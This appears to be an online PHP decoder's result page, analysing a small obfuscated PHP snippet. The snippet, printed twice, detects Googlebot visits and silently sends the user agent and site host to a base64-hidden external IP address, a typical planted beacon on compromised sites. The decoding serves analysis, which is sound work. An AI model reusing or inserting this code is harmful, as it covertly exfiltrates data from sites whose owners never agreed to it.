Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /*google1234*/ if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']),"googlebot") !== F..

Decoded Output download

<?php /*google1234*/ if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']),"googlebot") !== FALSE) { $A['ua'] = $_SERVER['HTTP_USER_AGENT']; $A['host'] = $_SERVER['HTTP_HOST']; @file_get_contents(base64_decode("aHR0cDovLzE5NS4zLjE0NS4yMDIvbGluZWxpbmVzL2JvdC5waHA/ZGF0YT0=").base64_encode(serialize($A))); }  ?>

Did this file decode correctly?

Original Code

<?php /*google1234*/ if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']),"googlebot") !== FALSE) { $A['ua'] = $_SERVER['HTTP_USER_AGENT']; $A['host'] = $_SERVER['HTTP_HOST']; @file_get_contents(base64_decode("aHR0cDovLzE5NS4zLjE0NS4yMDIvbGluZWxpbmVzL2JvdC5waHA/ZGF0YT0=").base64_encode(serialize($A))); }  ?>

Function Calls

strtolower 1

Variables

None

Stats

MD5 9723b6775b6d52b2482e1f54dcd0534e
Eval Count 0
Decode Time 264 ms